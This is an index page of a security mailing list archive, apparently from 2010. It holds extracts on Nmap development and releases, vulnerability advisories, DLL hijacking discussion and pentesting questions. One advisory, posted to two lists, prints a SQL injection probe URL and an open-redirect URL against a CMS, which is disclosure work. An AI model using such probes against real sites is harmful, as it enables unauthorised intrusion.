SecLists.Org Security Mailing List Archive

Any hacker will tell you that the latest news and exploits are not found on any web site—not even Insecure.Org. No, the cutting edge in security research is and will continue to be the full disclosure mailing lists such as Bugtraq. Here we provide web archives and RSS feeds (now including message extracts), updated in real-time, for many of our favorite lists. Browse the individual lists below, or search them all:

Insecure.Org Lists

Nmap Development — Unmoderated technical development forum for debating ideas, patches, and suggestions regarding proposed changes to Nmap and related projects.

Re: [Ncat] I'd like to contribute a feature miniBill (Sep 02)
2010/7/29 David Fifield <david () bamsoftware com>:

I've rapidly checked ncat_listen.c which is the file which, as far as
I could understand,
actually invokes the platform-specific calls. As it works now it
executes the command
every time someone connects. What I would like to do is to have one
single command
execution, which collects all the users' input, and whose output is
copied to every user.
As small as I can understand it, it won't...

Re: lua brocken in nse script Seth Graham (Sep 01)
Ok Patrick, I'll do it and I'll coment the results on this list.

Thks for your help and congrutalutions for the job in NSE ;),
Seth

2010/9/2 Patrick Donnelly <batrick () batbytes com>

Re: lua brocken in nse script Patrick Donnelly (Sep 01)
I don't see anything wrong with what you've done from here. Do the
following to see if this helps find the problem:

(1) Configure Nmap with --with-liblua=included. This will make Nmap
statically bind to Lua.

If the problem still occurs, turn Lua assertions on (keeping the above
change for static linking):

(2) Add "-DLUA_USE_APICHECK" to CFLAGS in nmap/liblua/Makefile.

Lua will catch most common errors this way.

Re: lua brocken in nse script Seth Graham (Sep 01)
Hi Patrick,

2010/9/1 Patrick Donnelly <batrick () batbytes com>

I saw from the output that you are using Gentoo. Are you using the

Yes, I use gentoo and for default my gcc CFLAGS optimizations are set to
-02, configuring nmap 5.21-r1 (with gentoo patches, I attach these) with lua
and ssl support and lua libaries dinamically.

With this optimizations compilation flags all my system is working fine (-02
is not so hard to break code...

Re: lua brocken in nse script Patrick Donnelly (Sep 01)
Hello Seth,

I'm unable to reproduce this problem. I suspect your Nmap is
configured/compiled improperly. Usually when there are GC segfaults it
results from two different Lua installations being linked to (usually
dynamic and static linking). Although, I find this unlikely
considering where the fault occurred.

I saw from the output that you are using Gentoo. Are you using the
installation provided by Gentoo or did you compile Nmap yourself? If...

lua brocken in nse script Seth Graham (Sep 01)
Hi to everybody,

I'm working in a litlle nse script to find proxys with method CONNECT
available. I've test it with some parameters contexts and it works fine,
but when it's working with a very large ip range it crash. I don't know if
it is a nse engine problem (with multithreading maybe?), a problem in my
litle script or in lua libraries.

I write you a Segfault debug to improbe some solution. Lets go.

==============================...

Re: rainmap - nmap wrapper for worker process alexandru (Sep 01)
Thanks for your patience, SVN r20063 should be what you need. The worker code is in src/celeryd and can be run as is on
the worker nodes, provided dependencies are met and with the one caveat that the web-app instance must also be a
RabbitMQ node, though it doesn't need to be involved in scanning.

More details in docs/INSTALL. I'm looking forward for feedback related to either the install doc/procedure, or patches
to make the code better....

Re: Adding new NSE discovered targets to Nmap Djalal Harouni (Aug 31)
Hi,

I've just merged my nmap-add-targets branch as r20044, so you can go
ahead and use the new NSE library target.lua to add new discovered targets.

Pls keep in mind that currently:
o By targets we mean targets specifications that are supported by Nmap
(hostnames, IP, networks etc).
o There is some target filtering but it is based on target specification
*strings*, and we only filter new targets that are added by NSE scripts,
Nmap targets are...

Re: nmap potentially vulnerable to Windows DLL Hijacking Rob Nicholls (Aug 31)
This is presumably similar to the Wireshark issue:

http://www.exploit-db.com/exploits/14721/
http://www.nessus.org/plugins/index.php?view=single&id=48943

I must admit I was surprised to hear that Nmap tries to load this file
as it's not one that's usually distributed with WinPcap (it's related to
AirPcap, a separate project from CACE Technologies). I presume we can do
something in Nmap to fix/workaround this issue (perhaps copy whatever
the...

nmap potentially vulnerable to Windows DLL Hijacking Nikhil Mittal (Aug 31)
Hi,

I was just checking nmap 5.21 for Windows DLL hijacking and it seems that nmap is searching for airpcap.dll in
"insufficient qualified path". If I force nmap to open a file from a network share it do try to load dll from that
share, it means it is vulnerable? correct me if wrong. I am unable to exploit the vulnerability because while accessing
airpcap.dll from network share I can see FAST IO Disallowed in procmon. I have no idea...

Re: Ncrack 0.2 Alpha - SSH behaviour ithilgore (Aug 31)
Hello Mike.
The Ncrack engine is built that way so that it initially increases the
number of parallel connections and then as it reaches the maximum capacity
of the server (as determined by closed connections or timeouts), it will
slowly decrease them before finally stabilizing.
Ncrack also uses a username/password pool where it places credentials that
weren't tested successfully (because the connection was prematurely closed
or whatever other...

Re: Ncrack 0.2 Alpha - SSH behaviour Robin Wood (Aug 31)
Oh well, there goes my theory!

I'll have a look at the ncrack throttling stuff, could be useful in my work.

Robin

RE: Ncrack 0.2 Alpha - SSH behaviour Mike Westmacott (Aug 31)
Hi Robin,
As I understand it nmap will attempt to determine what the maximum number of concurrent connections is when it starts
up, and will throttle back connections if it starts to see them being closed (according to debug). My issue here is
that I have two large files (I'm not saying it's down to size though!) - both which contain the correct password for
the user - and one of them will correctly identify the password, the other will not. I...

Re: NMAP hangs on MIPS Nuno Gonçalves (Aug 31)
2010/8/31 Nuno Gonçalves <nunojpg () gmail com>:

The problem is with the use of class std::nmap<port_spec,
service_node> service_table.

line 241: i = service_table.find(ps); takes 50% of the time.
line 274: service_table[ps] = sn; takes 45% of the time.

Any suggestions why is this so slow on MIPS? Do I need optimization flags?

Thanks,
Nuno

Re: Ncrack 0.2 Alpha - SSH behaviour Robin Wood (Aug 31)
I've not tried ncrack but I am working on an ssh bruteforcer of my own
and I've found a problem when testing against openssh, there is a
MaxStartups value that governs the "maximum number of concurrent
unauthenticated connections" check man sshd_config for more info.

I don't know if it was designed to protect against brute force attacks
but it does it because if you fire loads of passwords at once then you
trigger this limit and all...

Nmap Hackers — Moderated list for the most important new releases and announcements regarding the Nmap Security Scanner and related projects. We recommend that all Nmap users subscribe.

Nmap Defcon Release: Version 5.35DC1 Fyodor (Jul 16)
Hi folks. It has been 3.5 months since the last Nmap release
(5.30BETA1 on March 29), and anyone following the nmap-dev list knows
that we've been very busy during that time. So I'm pleased to release
Nmap version 5.35DC1 containing the fruits of that labor. The Defcon
name is because that conference is awesome! And also because David
Fifield and I have an exciting Nmap talk planned there and at Black
Hat in a couple weeks (see...

Nmap News and Last Chance to Take the Survey Fyodor (Apr 30)
Hi Folks. I have some Nmap news to share with you:

First off, I'm delighted to introduce the 2010 Nmap/Google Summer of
Code Team! Google has sponsored eight student developers to spend
this summer enhancing the Nmap Security Scanner and related projects,
so you can expect great things in coming months. Ithilgore and Luis
MartinGarcia are returning to improve Ncrack and Nping, new students
Drazen Popovic and Djalal Harouni will be working on...

Survey Reminder Fyodor (Apr 14)
Hi folks, I have a quick question for you:

Q: What do the Nmap Scripting Engine, Ndiff, and the Zenmap Topology
Mapper have in common?

A: They're all features which were added after you asked for them in
the 2006 Nmap Survey!

With that in mind, I'd like to thank the 1,013 people who have already
taken the 2010 survey. We just need 1,987 more and we can close this
survey up, tabulate and share results, choose the prize winners, and
post...

Nmap/SecTools Survey and GSoC Deadline Fyodor (Apr 07)
Hello everyone. I hope you're enjoying the 5.30BETA1 release. So far
it has proven stable and functional, so don't let the BETA name scare
you. You can get it at http://nmap.org/download.html. Meanwhile, I
have some great news, and I'm also asking for your help on two things.

The first is that the Nmap Project was again accepted for the Google
Summer of Code program, so we'll have full time coding help this
summer! SoC previously brought us...

Nmap 5.30BETA1 Released w/37 new scripts and new Apple vuln Fyodor (Mar 29)
Hi folks! It has been two months since the 5.21 release and we've
been very busy during that time! I hope you're happy with the results,
which is a new 5.30BETA1 release made today. Top features include:

o 37 new NSE scripts, bringing the total to 117! New scripts cover
SNMP, SSL, Postgress, MySQL, HTTP, LDAP, NFS, DB2, AFS, and many
more. Also check out the clever host scripts qscan and
ipidseq. Learn about them all at...

Nmap 5.21 released Fyodor (Jan 27)
Hello everyone. I'm pleased to release Nmap 5.21, which contains zero
exciting new features! It is a bug-fix only release instead,
addressing about a dozen issues discovered since 5.20. Thanks for all
the testing and bug reports! None of the bugs are critical, but we
wanted to polish things up since 5.21 may be the latest stable version
for a while. That gives us time to tackle and stabilize big
development projects. If you want to know...

Lots of Nmap News Fyodor (Jan 22)
Hi folks. I'm happy to report that the 5.20 release went well. But
with this many improvements, there will always be a few bugs found.
We're planning to round those up with a bugfix-only 5.21 release next
week. So please test out 5.20 and report any problems you experience:

Download Page: http://nmap.org/download.html
Bug Report Instructions: http://nmap.org/book/man-bugs.html

If you're running from a build of the latest SVN checkout, you...

Nmap 5.20 Released Fyodor (Jan 20)
Happy new year, everyone. I'm happy to announce Nmap 5.20--our first
stable Nmap release since 5.00 last July! It offers more than 150
significant improvements, including:
o 30+ new Nmap Scripting Engine scripts
o enhanced performance and reduced memory consumption
o protocol-specific payloads for more effectie UDP scanning
o a completely rewritten traceroute engine
o massive OS and version detection DB updates (10,000+ signatures)

The...

Nmap 5.00 Released! Fyodor (Jul 16)
Hello everyone. I'm delighted to announce the release of Nmap 5.00!
This is the first major release since 4.50 in 2007, and includes about
600 significant changes since then! We consider this the most
important Nmap release since 1997, and we recommend that all current
users upgrade.

There are too many changes to list them all in this email, so here are
the top 5 improvements in Nmap 5:

1) The new Ncat tool aims to be your Swiss Army Knife...

Nmap news: stable release candidate 4.90RC1, SoC team, and new translations Fyodor (Jun 26)
Hi Folks. I'm pleased to announce some exciting Nmap news:

[=================Nmap 4.90RC1==================]

It has been nearly 10 months (and 11 dev releases) since 4.76, the
last stable Nmap release. And we've made many dramatic changes, so it
is time for a new stable version! I've posted a release
candidate--4.90RC1--on the Nmap download page:

http://nmap.org/download.html

Please test it out, and let us know if you find any problems...

Nmap 4.85BETA6 now avail w/Conficker detection Fyodor (Apr 01)
Hi Folks! In case you missed all the news reports yesterday, a couple
great researchers from the Honeynet Project (Tillmann Werner and Felix
Leder) and Dan Kaminsky came up with a way to remotely detect the
Conficker worm which has infected millions of machines worldwide.
Some say 15,000,000 machines infected, but that might just be
exaggerated AV-company BS for all I know. But there are clearly
millions of infections, and this massive botnet...

Nmap News: 4.84BETA4 release, Nmap book news, Summer of Code, Twitter, etc. Fyodor (Mar 27)
Hello everyone. We've seen 848 messages on nmap-dev this year, but
this is my first post to nmap-hackers. So I have a lot of exciting
Nmap news to fit into this one email!

[=================Nmap 4.85BETA4==================]

While the last release I posted to this list was 4.76 in September of
last year, we've had four beta releases since then with hundreds of
important and dramatic changes. I'm pretty happy with the latest
4.85BETA4 release,...

Other Excellent Security Lists

Bugtraq — The premier general security mailing list. Vulnerabilities are often announced here first, so check frequently!

Vulnerabilities in CMS WebManager-Pro MustLive (Sep 02)
Hello Bugtraq!

I want to warn you about SQL Injection and Redirector (URL Redirector Abuse)
vulnerabilities in CMS WebManager-Pro (SecurityVulns ID:11108). It's
Ukrainian commercial CMS.

SQL Injection:

http://site/c.php?id=1%20and%20version()=5

Redirector:

http://site/c.php?id=1&url=http://websecurity.com.ua

Affected products: both systems CMS WebManager-Pro from two developers.
Vulnerable are versions CMS WebManager-Pro up to 8.1...

{PRL} Novell Netware OpenSSH Remote Stack Overflow Francis Provencher (Sep 02)
#####################################################################################

Application: Novell Netware OpenSSH Remote Stack Overflow

Platforms: Netware 6.5

Exploitation: Remote code execution

CVE Number:

Novell TID: 7006756

ZeroDayInitiative: ZDI-10-169

Author: Francis Provencher (Protek Research Lab's)

Blog: http://www.protekresearchlab.com/...

Moovida Media Player version 2.0.0.15 Insecure DLL Hijacking Vulnerability (libc.dll,quserex.dll) YGN Ethical Hacker Group (Sep 02)
1. OVERVIEW

The Moovida Media Player application is vulnerable to Insecure DLL
Hijacking Vulnerability. Similar terms that describe this
vulnerability
have been come up with Remote Binary Planting, Unsafe Library Loading,
and Insecure DLL Loading/Injection/Hijacking/Preloading.

2. PRODUCT DESCRIPTION

Moovida Media Player is a free and open source media center that
allows you to enjoy all of your music, video and pictures
in an awsome...

[ MDVSA-2010:168 ] openssl security (Sep 02)
_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:168
http://www.mandriva.com/security/
_______________________________________________________________________

Package : openssl
Date : September 1, 2010
Affected: 2010.1
_______________________________________________________________________

Problem Description:

A vulnerability has been found...

[ MDVSA-2010:169 ] mozilla-thunderbird security (Sep 02)
_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:169
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mozilla-thunderbird
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2010.0, 2010.1
_______________________________________________________________________

Problem...

[USN-982-1] Wget vulnerability Marc Deslauriers (Sep 02)
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem...

XSS vulnerability in ArtGK CMS advisory (Sep 01)
Vulnerability ID: HTB22588
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_artgk_cms_1.html
Product: ArtGK CMS
Vendor: ArtGK ( http://artgk-cms.ru/ )
Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...

Online Binary Planting Exposure Test ACROS Lists (Sep 01)
ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.

URL: http://www.binaryplanting.com/test.htm

Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out...

XSS vulnerability in Rumba CMS tags advisory (Sep 01)
Vulnerability ID: HTB22591
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_rumba_cms.html
Product: Rumba CMS
Vendor: Rumba Netware Ltd. ( http://rumbacms.com )
Vulnerable Version: 2.4 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking...

XSS vulnerability in ArtGK CMS forum advisory (Sep 01)
Vulnerability ID: HTB22587
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_artgk_cms.html
Product: ArtGK CMS
Vendor: ArtGK ( http://artgk-cms.ru/ )
Vulnerable Version: 2009-08-28 16:00:00 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...

XSS vulnerability in Rumba CMS advisory (Sep 01)
Vulnerability ID: HTB22592
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_rumba_cms_1.html
Product: Rumba CMS
Vendor: Rumba Netware Ltd. ( http://rumbacms.com )
Vulnerable Version: 2.4 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Low
Credit: High-Tech Bridge SA - Ethical Hacking &...

Tortoise SVN DLL Hijacking Vulnerability nikhil_uitrgpv (Sep 01)
The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2010-3199 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems.

XSS vulnerability in Amiro.CMS FAQ advisory (Sep 01)
Vulnerability ID: HTB22590
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_amiro_cms_1.html
Product: Amiro.CMS
Vendor: Amiro ( http://www.amiro.ru/ )
Vulnerable Version: 5.8.4.0 and Probably Prior Versions
Vendor Notification: 18 August 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking &...

VMSA-2010-0013 VMware ESX third party updates for Service Console VMware Security Team (Sep 01)
------------------------------------------------------------------------
VMware Security Advisory

Advisory ID: VMSA-2010-0013
Synopsis: VMware ESX third party updates for Service Console
Issue date: 2010-08-31
Updated on: 2010-08-31 (initial release of advisory)
CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
CVE-2010-1321 CVE-2010-1168 CVE-2010-1447...

VMSA-2010-0013 VMware Security Team (Sep 01)
------------------------------------------------------------------------
VMware Security Advisory

Advisory ID: VMSA-2010-0013
Synopsis: VMware ESX third party updates for Service Console
Issue date: 2010-08-31
Updated on: 2010-08-31 (initial release of advisory)
CVE numbers: CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
CVE-2010-1321 CVE-2010-1168 CVE-2010-1447...

Full Disclosure — An unmoderated high-traffic forum for disclosure of security information. Fresh vulnerabilities sometimes hit this list many hours before they pass through the Bugtraq moderation queue. The relaxed atmosphere of this quirky list provides some comic relief and certain industry gossip. Unfortunately 80% of the posts are worthless drivel, so finding the gems takes patience.

Re: DLL hijacking with Autorun on a USB drive Pavel Kankovsky (Sep 02)
If your OS's security model "understands" programs and data belong in
different security domains then every instruction of code on your computer
is trusted to enforce that policy. Your line of defence goes through every
program and any bug can breach it. The failure is inevitable. [1]

[1] P. A. Loscocco, S. D. Smalley, P. A. Muckelbauer, R. C. Taylor,
S. J. Turner and J. F. Farrell, "The Inevitability of Failure: The Flawed...

Re: question regarding RSA Pavel Kankovsky (Sep 02)
You made general questions about RSA as a cryptographic primitive.
There was nothing about PKI in them.

RSA encryption uses public keys. Public keys are--as their name
suggests--supposed to be known publicly. Anyone can compute ciphertexts
from plaintexts. An encryption oracle will not help you crack RSA private
keys. If you can do it with the oracle, you can do it without the oracle
as well.

As far as encryption is concerned the purpose of...

Verizon Wireless security contact? auto666077 (Sep 02)
I'm looking for a Verizon Wireless security contact to report
somewhat minor security issues with their software. If you know
one, I'd appreciate it if you could reply to me with their contact
info.

[ MDVSA-2010:169 ] mozilla-thunderbird security (Sep 02)
_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2010:169
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mozilla-thunderbird
Date : September 2, 2010
Affected: 2008.0, 2009.0, 2010.0, 2010.1
_______________________________________________________________________

Problem...

Re: DLL hijacking POC (failed, see for yourself) p8x (Sep 02)
Hi Christian,

I tested the POC here on Win 7 x64 ultimate fully updated and the issue
does work for me.

Vulnerabilities in CMS WebManager-Pro MustLive (Sep 02)
Hello Full-Disclosure!

I want to warn you about SQL Injection and Redirector (URL Redirector Abuse)
vulnerabilities in CMS WebManager-Pro (SecurityVulns ID:11108). It's
Ukrainian commercial CMS.

SQL Injection:

http://site/c.php?id=1%20and%20version()=5

Redirector:

http://site/c.php?id=1&url=http://websecurity.com.ua

Affected products: both systems CMS WebManager-Pro from two developers.
Vulnerable are versions CMS WebManager-Pro up to...

Re: DLL hijacking POC (failed, see for yourself) Jacky Jack (Sep 02)
http://support.microsoft.com/kb/2264107

This is just optional. Not mandatory patch update as far as I know.

[USN-982-1] Wget vulnerability Marc Deslauriers (Sep 02)
===========================================================
Ubuntu Security Notice USN-982-1 September 02, 2010
wget vulnerability
CVE-2010-2252
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem...

Re: DLL hijacking POC (failed, see for yourself) Larry Seltzer (Sep 02)
I don’t think you read my e-mail. They fixed it. Have you retested today?

*From:* Christian Sciberras [mailto:uuf6429 () gmail com]
*Sent:* Thursday, September 02, 2010 9:44 AM
*To:* Larry Seltzer
*Cc:* full-disclosure () lists grok org uk
*Subject:* Re: [Full-disclosure] DLL hijacking POC (failed, see for
yourself)

As I said at the very first email, the POC, even at it's best, doesn't work
on my 64bit system at all.

Regards,
Chris.

On Thu,...

Re: DLL hijacking POC (failed, see for yourself) Christian Sciberras (Sep 02)
As I said at the very first email, the POC, even at it's best, doesn't work
on my 64bit system at all.

Regards,
Chris.

On Thu, Sep 2, 2010 at 3:41 PM, Larry Seltzer <larry () larryseltzer com>wrote:

Re: DLL hijacking POC (failed, see for yourself) Larry Seltzer (Sep 02)
FYI everyone, ACROS has fixed the POC for 64-bit systems. The old one
failed on my Win7 64-bit and the new one works.

http://www.binaryplanting.com/test.htm

I did notice that if you just click on the link
(\\www.binaryplanting.com\demo\windows_address_book_64) Windows turns it
into a file:// url and opens it in the default browser (Chrome in my
case). The POC won't work because there's no remote CWD (at least I
imagine there isn't). If this is...

Re: DLL hijacking POC (failed, see for yourself) Darren McDonald (Sep 02)
We're not, Microsoft have decided to make it the system administrators
problem through this registry setting. Which is fair enough IMO :)

(resent as I used the wrong from address)

Re: DLL hijacking POC (failed, see for yourself) Darren McDonald (Sep 02)
I think that depends if its installed and on how the setting is
configured. Some environments are going to require DLLs to be loaded
from remote shares, others not. This isnt a 'patch' to a software
security flaw, its a security setting. Im guessing the default
configuration maybe messing around with the mentioned PoC, that was my
only point.

Re: DLL hijacking POC (failed, see for yourself) Christian Sciberras (Sep 02)
Uh, what I was asking, is, with this patch in place, the issue is fixed,
forever?

Cheers,
Chris.

Re: DLL hijacking POC (failed, see for yourself) Christian Sciberras (Sep 02)
Thanks Darren, that was very enlightening.
Considering those facts, where are we at in fixing this whole issue?

Cheers,
Chris.

Security Basics — A high-volume list which permits people to ask "stupid questions" without being derided as "n00bs". I recommend this list to network security newbies, but be sure to read Bugtraq and other lists as well.

Re: Is Outlook Anywhere secure? Andre Pawlowski (Sep 02)
After I searched a lot in the net about this topic I often found my
eMail in this list.

Now I have done my research and configuration to this topic and want to
give others a hint where to look. I wrote informations and
configurations about this topic in my blog (only in german)

http://blog.h4des.org/index.php?/archives/279-TMG-als-Proxy-Outlook-Anywhere-hardening.html

So feel free to use it and feel free to ask if something bothers you....

using cvss to assess process problems robsonde (Sep 02)
our IT managers have ask that we use CVSS to assess security issues for the last few months.

we have quite a good understanding of the system when it is used for "bugs".

but we have a few security issues that are more of a failure of process, people doing the wrong thing and such like.

these risks don't fit the CVSS frame work at all, but at the same time we can see that they are security issues that
need to be assessed.

for...

Re: download by specified file type J. Bakshi (Sep 02)
wget -r -A "*.gif" http://www.test.com

-A >> accept

-r >> recursive download

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how
it benefits your company and how your customers can tell if a site is secure. You will find out...

Outlook anywhere exzactly (Aug 31)
Has anyone else seen implementations of Outlook Anywhere? Personally I think
its not needed and a security risk but I want to see what the community has
to say.

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who needs an SSL certificate. We look at how SSL works, how
it benefits your company and how...

download by specified file type who cat (Aug 31)
I wanna know how to use wget or curl to download the specified file ,
eg , download all the GIF file from the http://www.test.com
How can i achieve that?
Thanks!

All you best
------------------------
What we are struggling for ?
The life or the life ?

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we examine the importance of Apache-SSL and who...

RE: RainbowCrack rainbow table generate Pete.LeMay (Aug 27)
Check out the tables at freerainbowtables.com. If those don't suit your needs, the forum has several discussions on
this question.

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On Behalf Of win.a
Sent: Wednesday, August 25, 2010 11:39 PM
To: security-basics () securityfocus com
Subject: RainbowCrack rainbow table generate

i want to user rainbowcrack to generate the rainbow table, but...

RainbowCrack rainbow table generate win.a (Aug 26)
i want to user rainbowcrack to generate the rainbow table,
but i don' how can i determine the parameter :
chain_len
chain_num
is there a way to calculate it ?Anyone any suggestions are appreciate.

All you best
------------------------
What we are struggling for ?
The life or the life ?

------------------------------------------------------------------------
Securing Apache Web Server with thawte Digital Certificate
In this guide we...

Re: security advice Erik (Aug 26)
Op 25-8-2010 9:14, Andrei Popescu schreef:

Hi,

Be warned! Usually it is never "only a counterstrike server". Do not
trust the box and reinstall. I've seen and investigated a hacked box
where it was thought to "only run a psybounce". It turned out a lot more
was happening but since the kernel was made to shut up about it, it
would not show the rest of the activities. It was a database server for
provisioning an ISP. A...

[HITB-Announce] HITB2010 SIGNINT Sessions Hafez Kamal (Aug 26)
Hack In The Box is proud to announce, a brand new lightning session
called HITB SIGINT (Signal Intelligence/Interrupt)! HITB SIGINT
sessions are designed to provide a quick 15 minute overview for
material and research that's up and coming - stuff that isn't quite
ready for the mainstream tracks of the conference but deserve a mention
nonetheless. Final year students who want to present their projects to
industry experts are also strongly...

RE: security advice Andrei Popescu (Aug 25)
Hello,
I had something like this also.. I still have all the files, but in
my case the "hacker" just runned a CounterStrike server on my box. I have
found the exploit in a website that I host, it was an oscommerce and it had
a security issue in the pictures folder.. don't know how he had access but
the thing is he managed to reinstall openssh and somehow he got the root
password (not change it, I saw him logging in the...

RE: security advice Grant, Richard (KYTC) (Aug 25)
Edmund I think you may need a different approach to Incident handling. We have experienced a couple compromised
servers. With over 3,000 servers physical and virtual we are too big of a target to miss forever. First the horse is
already out of the barn. Slamming the door shut will not change that.

This is a time for the Incident Handling Team to be called into action. This team would develop a plan for dealing
with the incident. Some of the...

Re: security advice debiantech (Aug 25)
Hi,

Although not the only way this can happen, I am willing to bet this
machine is not only an email server but a public web server. Not only
this but a guess is you are running some sort of CMS/CRM on that
webserver that uses PHP, possibly a web based email interface. If I have
been right so far, my first suggestion is to go to the home page for the
software and compare the version you have to the current stable version
and read the...

Re: security advice Robert Larsen (Aug 25)
Not knowing how you work makes your question hard to answer but a few
quick ones:
* Keep the system up to date (apt-get update && apt-get upgrade or similar)
* Install a host based intrusion detection system like Tripwire or AIDE
* Install a network based intrusion detection system like Snort
* Harden your installations with something like Bastille
* Run your system from a read-only filesystem and having only your mail
folders on writable...

Re: security advice Mike Razzell (Aug 25)
Maybe this is considered obvious to others of greater experience or
expertise in the field but doesn't the possibility exist that they
could look at all the logs and configurations and find no
vulnerability permitting a point of entry if a user with
administrative credentials logged in from a compromised client or
(less likely IMO) over an unsecured connection ie. plaintext. If this
is the case you could fix everything you find and still get...

RE: security advice Murda (Aug 25)
Hey Edmund,
First and foremost I will commend your honesty. Unfortunately, the fear of
reprimand can often cloud this area so much that people begin lying to cover
themselves; which then means that resolutions are harder to achieve. This
candour is exactly what is needed when investigating and responding to an
incident. Also make sure you document everything you did and do(as much as
is reasonable).

I think you would still benefit from having an...

Penetration Testing — While this list is intended for "professionals", participants frequenly disclose techniques and strategies that would be useful to anyone with a practical interest in security and network auditing.

Re: WAF Testing..suggestions?? bin4ry (Sep 01)
Hey False,

one thing you should keep in mind: While i was pentesting mod_security
and a bunch of commercial WAFs, i recognized that most of the products
work pretty well with popular assessment tools (w3af, etc.). They
detectedmost of the attacks. Afterwards i setup a vulnerable website
and tried to manually attack it. There was a huge difference: A lot of
manuall attacks were not recognized. I guess this is because most of
those WAF vendors try...

Re: WAF Testing..suggestions?? Yiannis Koukouras (Sep 01)
Hi False,

You can also try Http Parameter Pollution (HPP) attacks
http://www.securitytube.net/HTTP-Parameter-Pollution-%28HPP%29-Attack-video.aspx

Cheers,
Ioannis (Yiannis) Koukouras
CISSP, CISA, CISM
MSc in Computer Systems Security
BEng in Electronic Engineering
http://www.linkedin.com/in/ikoukouras
---
The information contained in this communication is intended solely
for the use of the individual or entity to whom it is addressed
and...

Re: Pentestn ASP website with tinymce Robin Wood (Sep 01)
Exploit DB is a good start:

http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=tinymce&filter_author=&filter_platform=0&filter_type=0&filter_port=&filter_osvdb=&filter_cve=

And Security Focus

http://www.securityfocus.com/vulnerabilities

Its better than some of the native speakers!

Robin

------------------------------------------------------------------------
This list is...

nullcon Goa dwitiya (2.0) Call For Papers nullcon (Sep 01)
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---------------
- Bakkar: 1 Hr Talks
-...

Re: Pentestn ASP website with tinymce Justin Klein Keane (Sep 01)
Hello,

TinyMCE is a JavaScript based WYSIWYG editor, not a content management
system. TinyMCE can be configured to run independently of any dynamic
code, and doesn't present any security vulnerability by itself. TinyMCE
has had problems in the past with file manipulation that involved unsafe
dynamic scripting (such as PHP).

Justin Klein Keane, C|EH CEPT
http://www.MadIrish.net

Pentestn ASP website with tinymce Luana C. Rocha (Aug 31)
Hi,

The company whose i work for is in process evaluating a new website.
They are not concerned about security, but with how easy is to update
the website content.
At this moment the developer that is winning this evaluating is
proposing to use tinymce as a content manager.
I read about tinymce and I'm really concerned about our security.
Does anyone uses the tinymce? Can anyone point me a good way to pentest
this site and how to enforce...

RE: Pentest - ISA server Christopher M (Aug 31)
I've witnessed this sort of behavior when a Untangle box (www.untangle.com)
was in place in front of ISA acting as a unified threat management bridge.
It acts as a catch all for inbound traffic.

Christopher.

-----Original Message-----
From: listbounce () securityfocus com [mailto:listbounce () securityfocus com] On
Behalf Of Ravipriya Thushara
Sent: Sunday, August 29, 2010 11:09 PM
To: Boyd, Chad
Cc: Kurt M. John; <pen-test () securityfocus...

Re: Pentest - ISA server Volker Tanger (Aug 30)
Greetings!

"Kurt M. John" <kurt.md.john () gmail com>:

What options did you use on NMAP?
By default it runs a SYN scan (-sS), and if the firewall or server
tested does some type of SYN-Flood-Protection, it will send SYN-ACK
packages without actually querying the host behind it (maybe adding
TCP-cookies).

